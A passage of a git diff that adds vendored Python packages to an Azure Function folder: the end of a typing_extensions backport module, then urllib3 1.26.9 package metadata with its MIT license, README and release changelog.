__repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type.') + return _UnpackAlias(self, (item,)) + + Unpack = _UnpackForm( + 'Unpack', + doc="""A special typing construct to unpack a variadic type. For example: + + Shape = TypeVarTuple('Shape') + Batch = NewType('Batch', int) + + def add_batch_axis( + x: Array[Unpack[Shape]] + ) -> Array[Batch, Unpack[Shape]]: ... + + """) + + def _is_unpack(obj): + return isinstance(obj, _UnpackAlias) + + +if hasattr(typing, "TypeVarTuple"): # 3.11+ + TypeVarTuple = typing.TypeVarTuple +else: + class TypeVarTuple: + """Type variable tuple. + + Usage:: + + Ts = TypeVarTuple('Ts') + + In the same way that a normal type variable is a stand-in for a single + type such as ``int``, a type variable *tuple* is a stand-in for a *tuple* + type such as ``Tuple[int, str]``. + + Type variable tuples can be used in ``Generic`` declarations. + Consider the following example:: + + class Array(Generic[*Ts]): ... + + The ``Ts`` type variable tuple here behaves like ``tuple[T1, T2]``, + where ``T1`` and ``T2`` are type variables. To use these type variables + as type parameters of ``Array``, we must *unpack* the type variable tuple using + the star operator: ``*Ts``. The signature of ``Array`` then behaves + as if we had simply written ``class Array(Generic[T1, T2]): ...``. + In contrast to ``Generic[T1, T2]``, however, ``Generic[*Shape]`` allows + us to parameterise the class with an *arbitrary* number of type parameters. + + Type variable tuples can be used anywhere a normal ``TypeVar`` can. + This includes class definitions, as shown above, as well as function + signatures and variable annotations:: + + class Array(Generic[*Ts]): + + def __init__(self, shape: Tuple[*Ts]): + self._shape: Tuple[*Ts] = shape + + def get_shape(self) -> Tuple[*Ts]: + return self._shape + + shape = (Height(480), Width(640)) + x: Array[Height, Width] = Array(shape) + y = abs(x) # Inferred type is Array[Height, Width] + z = x + x # ... is Array[Height, Width] + x.get_shape() # ... is tuple[Height, Width] + + """ + + # Trick Generic __parameters__. + __class__ = typing.TypeVar + + def __iter__(self): + yield self.__unpacked__ + + def __init__(self, name): + self.__name__ = name + + # for pickling: + try: + def_mod = sys._getframe(1).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): + def_mod = None + if def_mod != 'typing_extensions': + self.__module__ = def_mod + + self.__unpacked__ = Unpack[self] + + def __repr__(self): + return self.__name__ + + def __hash__(self): + return object.__hash__(self) + + def __eq__(self, other): + return self is other + + def __reduce__(self): + return self.__name__ + + def __init_subclass__(self, *args, **kwds): + if '_root' not in kwds: + raise TypeError("Cannot subclass special typing classes") + + +if hasattr(typing, "reveal_type"): + reveal_type = typing.reveal_type +else: + def reveal_type(__obj: T) -> T: + """Reveal the inferred type of a variable. + + When a static type checker encounters a call to ``reveal_type()``, + it will emit the inferred type of the argument:: + + x: int = 1 + reveal_type(x) + + Running a static type checker (e.g., ``mypy``) on this example + will produce output similar to 'Revealed type is "builtins.int"'. + + At runtime, the function prints the runtime type of the + argument and returns it unchanged. + + """ + print(f"Runtime type is {type(__obj).__name__!r}", file=sys.stderr) + return __obj + + +if hasattr(typing, "assert_never"): + assert_never = typing.assert_never +else: + def assert_never(__arg: Never) -> Never: + """Assert to the type checker that a line of code is unreachable. + + Example:: + + def int_or_str(arg: int | str) -> None: + match arg: + case int(): + print("It's an int") + case str(): + print("It's a str") + case _: + assert_never(arg) + + If a type checker finds that a call to assert_never() is + reachable, it will emit an error. + + At runtime, this throws an exception when called. + + """ + raise AssertionError("Expected code to be unreachable") + + +if hasattr(typing, 'dataclass_transform'): + dataclass_transform = typing.dataclass_transform +else: + def dataclass_transform( + *, + eq_default: bool = True, + order_default: bool = False, + kw_only_default: bool = False, + field_specifiers: typing.Tuple[ + typing.Union[typing.Type[typing.Any], typing.Callable[..., typing.Any]], + ... + ] = (), + **kwargs: typing.Any, + ) -> typing.Callable[[T], T]: + """Decorator that marks a function, class, or metaclass as providing + dataclass-like behavior. + + Example: + + from typing_extensions import dataclass_transform + + _T = TypeVar("_T") + + # Used on a decorator function + @dataclass_transform() + def create_model(cls: type[_T]) -> type[_T]: + ... + return cls + + @create_model + class CustomerModel: + id: int + name: str + + # Used on a base class + @dataclass_transform() + class ModelBase: ... + + class CustomerModel(ModelBase): + id: int + name: str + + # Used on a metaclass + @dataclass_transform() + class ModelMeta(type): ... + + class ModelBase(metaclass=ModelMeta): ... + + class CustomerModel(ModelBase): + id: int + name: str + + Each of the ``CustomerModel`` classes defined in this example will now + behave similarly to a dataclass created with the ``@dataclasses.dataclass`` + decorator. For example, the type checker will synthesize an ``__init__`` + method. + + The arguments to this decorator can be used to customize this behavior: + - ``eq_default`` indicates whether the ``eq`` parameter is assumed to be + True or False if it is omitted by the caller. + - ``order_default`` indicates whether the ``order`` parameter is + assumed to be True or False if it is omitted by the caller. + - ``kw_only_default`` indicates whether the ``kw_only`` parameter is + assumed to be True or False if it is omitted by the caller. + - ``field_specifiers`` specifies a static list of supported classes + or functions that describe fields, similar to ``dataclasses.field()``. + + At runtime, this decorator records its arguments in the + ``__dataclass_transform__`` attribute on the decorated object. + + See PEP 681 for details. + + """ + def decorator(cls_or_fn): + cls_or_fn.__dataclass_transform__ = { + "eq_default": eq_default, + "order_default": order_default, + "kw_only_default": kw_only_default, + "field_specifiers": field_specifiers, + "kwargs": kwargs, + } + return cls_or_fn + return decorator + + +# We have to do some monkey patching to deal with the dual nature of +# Unpack/TypeVarTuple: +# - We want Unpack to be a kind of TypeVar so it gets accepted in +# Generic[Unpack[Ts]] +# - We want it to *not* be treated as a TypeVar for the purposes of +# counting generic parameters, so that when we subscript a generic, +# the runtime doesn't try to substitute the Unpack with the subscripted type. +if not hasattr(typing, "TypeVarTuple"): + typing._collect_type_vars = _collect_type_vars + typing._check_generic = _check_generic + + +# Backport typing.NamedTuple as it exists in Python 3.11. +# In 3.11, the ability to define generic `NamedTuple`s was supported. +# This was explicitly disallowed in 3.9-3.10, and only half-worked in <=3.8. +if sys.version_info >= (3, 11): + NamedTuple = typing.NamedTuple +else: + def _caller(): + try: + return sys._getframe(2).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): # For platforms without _getframe() + return None + + def _make_nmtuple(name, types, module, defaults=()): + fields = [n for n, t in types] + annotations = {n: typing._type_check(t, f"field {n} annotation must be a type") + for n, t in types} + nm_tpl = collections.namedtuple(name, fields, + defaults=defaults, module=module) + nm_tpl.__annotations__ = nm_tpl.__new__.__annotations__ = annotations + # The `_field_types` attribute was removed in 3.9; + # in earlier versions, it is the same as the `__annotations__` attribute + if sys.version_info < (3, 9): + nm_tpl._field_types = annotations + return nm_tpl + + _prohibited_namedtuple_fields = typing._prohibited + _special_namedtuple_fields = frozenset({'__module__', '__name__', '__annotations__'}) + + class _NamedTupleMeta(type): + def __new__(cls, typename, bases, ns): + assert _NamedTuple in bases + for base in bases: + if base is not _NamedTuple and base is not typing.Generic: + raise TypeError( + 'can only inherit from a NamedTuple type and Generic') + bases = tuple(tuple if base is _NamedTuple else base for base in bases) + types = ns.get('__annotations__', {}) + default_names = [] + for field_name in types: + if field_name in ns: + default_names.append(field_name) + elif default_names: + raise TypeError(f"Non-default namedtuple field {field_name} " + f"cannot follow default field" + f"{'s' if len(default_names) > 1 else ''} " + f"{', '.join(default_names)}") + nm_tpl = _make_nmtuple( + typename, types.items(), + defaults=[ns[n] for n in default_names], + module=ns['__module__'] + ) + nm_tpl.__bases__ = bases + if typing.Generic in bases: + class_getitem = typing.Generic.__class_getitem__.__func__ + nm_tpl.__class_getitem__ = classmethod(class_getitem) + # update from user namespace without overriding special namedtuple attributes + for key in ns: + if key in _prohibited_namedtuple_fields: + raise AttributeError("Cannot overwrite NamedTuple attribute " + key) + elif key not in _special_namedtuple_fields and key not in nm_tpl._fields: + setattr(nm_tpl, key, ns[key]) + if typing.Generic in bases: + nm_tpl.__init_subclass__() + return nm_tpl + + def NamedTuple(__typename, __fields=None, **kwargs): + if __fields is None: + __fields = kwargs.items() + elif kwargs: + raise TypeError("Either list of fields or keywords" + " can be provided to NamedTuple, not both") + return _make_nmtuple(__typename, __fields, module=_caller()) + + NamedTuple.__doc__ = typing.NamedTuple.__doc__ + _NamedTuple = type.__new__(_NamedTupleMeta, 'NamedTuple', (), {}) + + # On 3.8+, alter the signature so that it matches typing.NamedTuple. + # The signature of typing.NamedTuple on >=3.8 is invalid syntax in Python 3.7, + # so just leave the signature as it is on 3.7. + if sys.version_info >= (3, 8): + NamedTuple.__text_signature__ = '(typename, fields=None, /, **kwargs)' + + def _namedtuple_mro_entries(bases): + assert NamedTuple in bases + return (_NamedTuple,) + + NamedTuple.__mro_entries__ = _namedtuple_mro_entries diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/LICENSE.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/LICENSE.txt new file mode 100644 index 0000000..47127f3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/LICENSE.txt @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2008-2020 Andrey Petrov and contributors (see CONTRIBUTORS.txt) + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/METADATA new file mode 100644 index 0000000..f74a2f3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3-1.26.9.dist-info/METADATA @@ -0,0 +1,1426 @@ +Metadata-Version: 2.1 +Name: urllib3 +Version: 1.26.9 +Summary: HTTP library with thread-safe connection pooling, file post, and more. +Home-page: https://urllib3.readthedocs.io/ +Author: Andrey Petrov +Author-email: andrey.petrov@shazow.net +License: MIT +Project-URL: Documentation, https://urllib3.readthedocs.io/ +Project-URL: Code, https://github.com/urllib3/urllib3 +Project-URL: Issue tracker, https://github.com/urllib3/urllib3/issues +Keywords: urllib httplib threadsafe filepost http https ssl pooling +Platform: UNKNOWN +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet :: WWW/HTTP +Classifier: Topic :: Software Development :: Libraries +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4 +Description-Content-Type: text/x-rst +License-File: LICENSE.txt +Provides-Extra: brotli +Requires-Dist: brotlicffi (>=0.8.0) ; ((os_name != "nt" or python_version >= "3") and platform_python_implementation != "CPython") and extra == 'brotli' +Requires-Dist: brotli (>=1.0.9) ; ((os_name != "nt" or python_version >= "3") and platform_python_implementation == "CPython") and extra == 'brotli' +Requires-Dist: brotlipy (>=0.6.0) ; (os_name == "nt" and python_version < "3") and extra == 'brotli' +Provides-Extra: secure +Requires-Dist: pyOpenSSL (>=0.14) ; extra == 'secure' +Requires-Dist: cryptography (>=1.3.4) ; extra == 'secure' +Requires-Dist: idna (>=2.0.0) ; extra == 'secure' +Requires-Dist: certifi ; extra == 'secure' +Requires-Dist: ipaddress ; (python_version == "2.7") and extra == 'secure' +Provides-Extra: socks +Requires-Dist: PySocks (!=1.5.7,<2.0,>=1.5.6) ; extra == 'socks' + + +urllib3 is a powerful, *user-friendly* HTTP client for Python. Much of the +Python ecosystem already uses urllib3 and you should too. +urllib3 brings many critical features that are missing from the Python +standard libraries: + +- Thread safety. +- Connection pooling. +- Client-side SSL/TLS verification. +- File uploads with multipart encoding. +- Helpers for retrying requests and dealing with HTTP redirects. +- Support for gzip, deflate, and brotli encoding. +- Proxy support for HTTP and SOCKS. +- 100% test coverage. + +urllib3 is powerful and easy to use: + +.. code-block:: python + + >>> import urllib3 + >>> http = urllib3.PoolManager() + >>> r = http.request('GET', 'http://httpbin.org/robots.txt') + >>> r.status + 200 + >>> r.data + 'User-agent: *\nDisallow: /deny\n' + + +Installing +---------- + +urllib3 can be installed with `pip `_:: + + $ python -m pip install urllib3 + +Alternatively, you can grab the latest source code from `GitHub `_:: + + $ git clone git://github.com/urllib3/urllib3.git + $ pip install . + + +Documentation +------------- + +urllib3 has usage and reference documentation at `urllib3.readthedocs.io `_. + + +Contributing +------------ + +urllib3 happily accepts contributions. Please see our +`contributing documentation `_ +for some tips on getting started. + + +Security Disclosures +-------------------- + +To report a security vulnerability, please use the +`Tidelift security contact `_. +Tidelift will coordinate the fix and disclosure with maintainers. + + +Maintainers +----------- + +- `@sethmlarson `__ (Seth M. Larson) +- `@pquentin `__ (Quentin Pradet) +- `@theacodes `__ (Thea Flowers) +- `@haikuginger `__ (Jess Shapiro) +- `@lukasa `__ (Cory Benfield) +- `@sigmavirus24 `__ (Ian Stapleton Cordasco) +- `@shazow `__ (Andrey Petrov) + +👋 + + +Sponsorship +----------- + +If your company benefits from this library, please consider `sponsoring its +development `_. + + +For Enterprise +-------------- + +.. |tideliftlogo| image:: https://nedbatchelder.com/pix/Tidelift_Logos_RGB_Tidelift_Shorthand_On-White_small.png + :width: 75 + :alt: Tidelift + +.. list-table:: + :widths: 10 100 + + * - |tideliftlogo| + - Professional support for urllib3 is available as part of the `Tidelift + Subscription`_. Tidelift gives software development teams a single source for + purchasing and maintaining their software, with professional grade assurances + from the experts who know it best, while seamlessly integrating with existing + tools. + +.. _Tidelift Subscription: https://tidelift.com/subscription/pkg/pypi-urllib3?utm_source=pypi-urllib3&utm_medium=referral&utm_campaign=readme + + +Changes +======= + +1.26.9 (2022-03-16) +------------------- + +* Changed ``urllib3[brotli]`` extra to favor installing Brotli libraries that are still + receiving updates like ``brotli`` and ``brotlicffi`` instead of ``brotlipy``. + This change does not impact behavior of urllib3, only which dependencies are installed. +* Fixed a socket leaking when ``HTTPSConnection.connect()`` raises an exception. +* Fixed ``server_hostname`` being forwarded from ``PoolManager`` to ``HTTPConnectionPool`` + when requesting an HTTP URL. Should only be forwarded when requesting an HTTPS URL. + + +1.26.8 (2022-01-07) +------------------- + +* Added extra message to ``urllib3.exceptions.ProxyError`` when urllib3 detects that + a proxy is configured to use HTTPS but the proxy itself appears to only use HTTP. +* Added a mention of the size of the connection pool when discarding a connection due to the pool being full. +* Added explicit support for Python 3.11. +* Deprecated the ``Retry.MAX_BACKOFF`` class property in favor of ``Retry.DEFAULT_MAX_BACKOFF`` + to better match the rest of the default parameter names. ``Retry.MAX_BACKOFF`` is removed in v2.0. +* Changed location of the vendored ``ssl.match_hostname`` function from ``urllib3.packages.ssl_match_hostname`` + to ``urllib3.util.ssl_match_hostname`` to ensure Python 3.10+ compatibility after being repackaged + by downstream distributors. +* Fixed absolute imports, all imports are now relative. + + +1.26.7 (2021-09-22) +------------------- + +* Fixed a bug with HTTPS hostname verification involving IP addresses and lack + of SNI. (Issue #2400) +* Fixed a bug where IPv6 braces weren't stripped during certificate hostname + matching. (Issue #2240) + + +1.26.6 (2021-06-25) +------------------- + +* Deprecated the ``urllib3.contrib.ntlmpool`` module. urllib3 is not able to support + it properly due to `reasons listed in this issue `_. + If you are a user of this module please leave a comment. +* Changed ``HTTPConnection.request_chunked()`` to not erroneously emit multiple + ``Transfer-Encoding`` headers in the case that one is already specified. +* Fixed typo in deprecation message to recommend ``Retry.DEFAULT_ALLOWED_METHODS``. + + +1.26.5 (2021-05-26) +------------------- + +* Fixed deprecation warnings emitted in Python 3.10. +* Updated vendored ``six`` library to 1.16.0. +* Improved performance of URL parser when splitting + the authority component. + + +1.26.4 (2021-03-15) +------------------- + +* Changed behavior of the default ``SSLContext`` when connecting to HTTPS proxy + during HTTPS requests. The default ``SSLContext`` now sets ``check_hostname=True``. + + +1.26.3 (2021-01-26) +------------------- + +* Fixed bytes and string comparison issue with headers (Pull #2141) + +* Changed ``ProxySchemeUnknown`` error message to be + more actionable if the user supplies a proxy URL without + a scheme. (Pull #2107) + + +1.26.2 (2020-11-12) +------------------- + +* Fixed an issue where ``wrap_socket`` and ``CERT_REQUIRED`` wouldn't + be imported properly on Python 2.7.8 and earlier (Pull #2052) + + +1.26.1 (2020-11-11) +------------------- + +* Fixed an issue where two ``User-Agent`` headers would be sent if a + ``User-Agent`` header key is passed as ``bytes`` (Pull #2047) + + +1.26.0 (2020-11-10) +------------------- + +* **NOTE: urllib3 v2.0 will drop support for Python 2**. + `Read more in the v2.0 Roadmap `_. + +* Added support for HTTPS proxies contacting HTTPS servers (Pull #1923, Pull #1806) + +* Deprecated negotiating TLSv1 and TLSv1.1 by default. Users that + still wish to use TLS earlier than 1.2 without a deprecation warning + should opt-in explicitly by setting ``ssl_version=ssl.PROTOCOL_TLSv1_1`` (Pull #2002) + **Starting in urllib3 v2.0: Connections that receive a ``DeprecationWarning`` will fail** + +* Deprecated ``Retry`` options ``Retry.DEFAULT_METHOD_WHITELIST``, ``Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST`` + and ``Retry(method_whitelist=...)`` in favor of ``Retry.DEFAULT_ALLOWED_METHODS``, + ``Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT``, and ``Retry(allowed_methods=...)`` + (Pull #2000) **Starting in urllib3 v2.0: Deprecated options will be removed** + +* Added default ``User-Agent`` header to every request (Pull #1750) + +* Added ``urllib3.util.SKIP_HEADER`` for skipping ``User-Agent``, ``Accept-Encoding``, + and ``Host`` headers from being automatically emitted with requests (Pull #2018) + +* Collapse ``transfer-encoding: chunked`` request data and framing into + the same ``socket.send()`` call (Pull #1906) + +* Send ``http/1.1`` ALPN identifier with every TLS handshake by default (Pull #1894) + +* Properly terminate SecureTransport connections when CA verification fails (Pull #1977) + +* Don't emit an ``SNIMissingWarning`` when passing ``server_hostname=None`` + to SecureTransport (Pull #1903) + +* Disabled requesting TLSv1.2 session tickets as they weren't being used by urllib3 (Pull #1970) + +* Suppress ``BrokenPipeError`` when writing request body after the server + has closed the socket (Pull #1524) + +* Wrap ``ssl.SSLError`` that can be raised from reading a socket (e.g. "bad MAC") + into an ``urllib3.exceptions.SSLError`` (Pull #1939) + + +1.25.11 (2020-10-19) +-------------------- + +* Fix retry backoff time parsed from ``Retry-After`` header when given + in the HTTP date format. The HTTP date was parsed as the local timezone + rather than accounting for the timezone in the HTTP date (typically + UTC) (Pull #1932, Pull #1935, Pull #1938, Pull #1949) + +* Fix issue where an error would be raised when the ``SSLKEYLOGFILE`` + environment variable was set to the empty string. Now ``SSLContext.keylog_file`` + is not set in this situation (Pull #2016) + + +1.25.10 (2020-07-22) +-------------------- + +* Added support for ``SSLKEYLOGFILE`` environment variable for + logging TLS session keys with use with programs like + Wireshark for decrypting captured web traffic (Pull #1867) + +* Fixed loading of SecureTransport libraries on macOS Big Sur + due to the new dynamic linker cache (Pull #1905) + +* Collapse chunked request bodies data and framing into one + call to ``send()`` to reduce the number of TCP packets by 2-4x (Pull #1906) + +* Don't insert ``None`` into ``ConnectionPool`` if the pool + was empty when requesting a connection (Pull #1866) + +* Avoid ``hasattr`` call in ``BrotliDecoder.decompress()`` (Pull #1858) + + +1.25.9 (2020-04-16) +------------------- + +* Added ``InvalidProxyConfigurationWarning`` which is raised when + erroneously specifying an HTTPS proxy URL. urllib3 doesn't currently + support connecting to HTTPS proxies but will soon be able to + and we would like users to migrate properly without much breakage. + + See `this GitHub issue `_ + for more information on how to fix your proxy config. (Pull #1851) + +* Drain connection after ``PoolManager`` redirect (Pull #1817) + +* Ensure ``load_verify_locations`` raises ``SSLError`` for all backends (Pull #1812) + +* Rename ``VerifiedHTTPSConnection`` to ``HTTPSConnection`` (Pull #1805) + +* Allow the CA certificate data to be passed as a string (Pull #1804) + +* Raise ``ValueError`` if method contains control characters (Pull #1800) + +* Add ``__repr__`` to ``Timeout`` (Pull #1795) + + +1.25.8 (2020-01-20) +------------------- + +* Drop support for EOL Python 3.4 (Pull #1774) + +* Optimize _encode_invalid_chars (Pull #1787) + + +1.25.7 (2019-11-11) +------------------- + +* Preserve ``chunked`` parameter on retries (Pull #1715, Pull #1734) + +* Allow unset ``SERVER_SOFTWARE`` in App Engine (Pull #1704, Issue #1470) + +* Fix issue where URL fragment was sent within the request target. (Pull #1732) + +* Fix issue where an empty query section in a URL would fail to parse. (Pull #1732) + +* Remove TLS 1.3 support in SecureTransport due to Apple removing support (Pull #1703) + + +1.25.6 (2019-09-24) +------------------- + +* Fix issue where tilde (``~``) characters were incorrectly + percent-encoded in the path. (Pull #1692) + + +1.25.5 (2019-09-19) +------------------- + +* Add mitigation for BPO-37428 affecting Python <3.7.4 and OpenSSL 1.1.1+ which + caused certificate verification to be enabled when using ``cert_reqs=CERT_NONE``. + (Issue #1682) + + +1.25.4 (2019-09-19) +------------------- + +* Propagate Retry-After header settings to subsequent retries. (Pull #1607) + +* Fix edge case where Retry-After header was still respected even when + explicitly opted out of. (Pull #1607) + +* Remove dependency on ``rfc3986`` for URL parsing. + +* Fix issue where URLs containing invalid characters within ``Url.auth`` would + raise an exception instead of percent-encoding those characters. + +* Add support for ``HTTPResponse.auto_close = False`` which makes HTTP responses + work well with BufferedReaders and other ``io`` module features. (Pull #1652) + +* Percent-encode invalid characters in URL for ``HTTPConnectionPool.request()`` (Pull #1673) + + +1.25.3 (2019-05-23) +------------------- + +* Change ``HTTPSConnection`` to load system CA certificates + when ``ca_certs``, ``ca_cert_dir``, and ``ssl_context`` are + unspecified. (Pull #1608, Issue #1603) + +* Upgrade bundled rfc3986 to v1.3.2. (Pull #1609, Issue #1605) + + +1.25.2 (2019-04-28) +------------------- + +* Change ``is_ipaddress`` to not detect IPvFuture addresses. (Pull #1583) + +* Change ``parse_url`` to percent-encode invalid characters within the + path, query, and target components. (Pull #1586) + + +1.25.1 (2019-04-24) +------------------- + +* Add support for Google's ``Brotli`` package. (Pull #1572, Pull #1579) + +* Upgrade bundled rfc3986 to v1.3.1 (Pull #1578) + + +1.25 (2019-04-22) +----------------- + +* Require and validate certificates by default when using HTTPS (Pull #1507) + +* Upgraded ``urllib3.utils.parse_url()`` to be RFC 3986 compliant. (Pull #1487) + +* Added support for ``key_password`` for ``HTTPSConnectionPool`` to use + encrypted ``key_file`` without creating your own ``SSLContext`` object. (Pull #1489) + +* Add TLSv1.3 support to CPython, pyOpenSSL, and SecureTransport ``SSLContext`` + implementations. (Pull #1496) + +* Switched the default multipart header encoder from RFC 2231 to HTML 5 working draft. (Issue #303, Pull #1492) + +* Fixed issue where OpenSSL would block if an encrypted client private key was + given and no password was given. Instead an ``SSLError`` is raised. (Pull #1489) + +* Added support for Brotli content encoding. It is enabled automatically if + ``brotlipy`` package is installed which can be requested with + ``urllib3[brotli]`` extra. (Pull #1532) + +* Drop ciphers using DSS key exchange from default TLS cipher suites. + Improve default ciphers when using SecureTransport. (Pull #1496) + +* Implemented a more efficient ``HTTPResponse.__iter__()`` method. (Issue #1483) + +1.24.3 (2019-05-01) +------------------- + +* Apply fix for CVE-2019-9740. (Pull #1591) + +1.24.2 (2019-04-17) +------------------- + +* Don't load system certificates by default when any other ``ca_certs``, ``ca_certs_dir`` or + ``ssl_context`` parameters are specified. + +* Remove Authorization header regardless of case when redirecting to cross-site. (Issue #1510) + +* Add support for IPv6 addresses in subjectAltName section of certificates. (Issue #1269) + + +1.24.1 (2018-11-02) +------------------- + +* Remove quadratic behavior within ``GzipDecoder.decompress()`` (Issue #1467) + +* Restored functionality of ``ciphers`` parameter for ``create_urllib3_context()``. (Issue #1462) + + +1.24 (2018-10-16) +----------------- + +* Allow key_server_hostname to be specified when initializing a PoolManager to allow custom SNI to be overridden. (Pull #1449) + +* Test against Python 3.7 on AppVeyor. (Pull #1453) + +* Early-out ipv6 checks when running on App Engine. (Pull #1450) + +* Change ambiguous description of backoff_factor (Pull #1436) + +* Add ability to handle multiple Content-Encodings (Issue #1441 and Pull #1442) + +* Skip DNS names that can't be idna-decoded when using pyOpenSSL (Issue #1405). + +* Add a server_hostname parameter to HTTPSConnection which allows for + overriding the SNI hostname sent in the handshake. (Pull #1397) + +* Drop support for EOL Python 2.6 (Pull #1429 and Pull #1430) + +* Fixed bug where responses with header Content-Type: message/* erroneously + raised HeaderParsingError, resulting in a warning being logged. (Pull #1439) + +* Move urllib3 to src/urllib3 (Pull #1409) + + +1.23 (2018-06-04) +----------------- + +* Allow providing a list of headers to strip from requests when redirecting + to a different host. Defaults to the ``Authorization`` header. Different + headers can be set via ``Retry.remove_headers_on_redirect``. (Issue #1316) + +* Fix ``util.selectors._fileobj_to_fd`` to accept ``long`` (Issue #1247). + +* Dropped Python 3.3 support. (Pull #1242) + +* Put the connection back in the pool when calling stream() or read_chunked() on + a chunked HEAD response. (Issue #1234) + +* Fixed pyOpenSSL-specific ssl client authentication issue when clients + attempted to auth via certificate + chain (Issue #1060) + +* Add the port to the connectionpool connect print (Pull #1251) + +* Don't use the ``uuid`` module to create multipart data boundaries. (Pull #1380) + +* ``read_chunked()`` on a closed response returns no chunks. (Issue #1088) + +* Add Python 2.6 support to ``contrib.securetransport`` (Pull #1359) + +* Added support for auth info in url for SOCKS proxy (Pull #1363) + + +1.22 (2017-07-20) +----------------- + +* Fixed missing brackets in ``HTTP CONNECT`` when connecting to IPv6 address via + IPv6 proxy. (Issue #1222) + +* Made the connection pool retry on ``SSLError``. The original ``SSLError`` + is available on ``MaxRetryError.reason``. (Issue #1112) + +* Drain and release connection before recursing on retry/redirect. Fixes + deadlocks with a blocking connectionpool. (Issue #1167) + +* Fixed compatibility for cookiejar. (Issue #1229) + +* pyopenssl: Use vendored version of ``six``. (Issue #1231) + + +1.21.1 (2017-05-02) +------------------- + +* Fixed SecureTransport issue that would cause long delays in response body + delivery. (Pull #1154) + +* Fixed regression in 1.21 that threw exceptions when users passed the + ``socket_options`` flag to the ``PoolManager``. (Issue #1165) + +* Fixed regression in 1.21 that threw exceptions when users passed the + ``assert_hostname`` or ``assert_fingerprint`` flag to the ``PoolManager``. + (Pull #1157) + + +1.21 (2017-04-25) +----------------- + +* Improved performance of certain selector system calls on Python 3.5 and + later. (Pull #1095) + +* Resolved issue where the PyOpenSSL backend would not wrap SysCallError + exceptions appropriately when sending data. (Pull #1125) + +* Selectors now detects a monkey-patched select module after import for modules + that patch the select module like eventlet, greenlet. (Pull #1128) + +* Reduced memory consumption when streaming zlib-compressed responses + (as opposed to raw deflate streams). (Pull #1129) + +* Connection pools now use the entire request context when constructing the + pool key. (Pull #1016) + +* ``PoolManager.connection_from_*`` methods now accept a new keyword argument, + ``pool_kwargs``, which are merged with the existing ``connection_pool_kw``. + (Pull #1016) + +* Add retry counter for ``status_forcelist``. (Issue #1147) + +* Added ``contrib`` module for using SecureTransport on macOS: + ``urllib3.contrib.securetransport``. (Pull #1122) + +* urllib3 now only normalizes the case of ``http://`` and ``https://`` schemes: + for schemes it does not recognise, it assumes they are case-sensitive and + leaves them unchanged. + (Issue #1080) + + +1.20 (2017-01-19) +----------------- + +* Added support for waiting for I/O using selectors other than select, + improving urllib3's behaviour with large numbers of concurrent connections. + (Pull #1001) + +* Updated the date for the system clock check. (Issue #1005) + +* ConnectionPools now correctly consider hostnames to be case-insensitive. + (Issue #1032) + +* Outdated versions of PyOpenSSL now cause the PyOpenSSL contrib module + to fail when it is injected, rather than at first use. (Pull #1063) + +* Outdated versions of cryptography now cause the PyOpenSSL contrib module + to fail when it is injected, rather than at first use. (Issue #1044) + +* Automatically attempt to rewind a file-like body object when a request is + retried or redirected. (Pull #1039) + +* Fix some bugs that occur when modules incautiously patch the queue module. + (Pull #1061) + +* Prevent retries from occurring on read timeouts for which the request method + was not in the method whitelist. (Issue #1059) + +* Changed the PyOpenSSL contrib module to lazily load idna to avoid + unnecessarily bloating the memory of programs that don't need it. (Pull + #1076) + +* Add support for IPv6 literals with zone identifiers. (Pull #1013) + +* Added support for socks5h:// and socks4a:// schemes when working with SOCKS + proxies, and controlled remote DNS appropriately. (Issue #1035) + + +1.19.1 (2016-11-16) 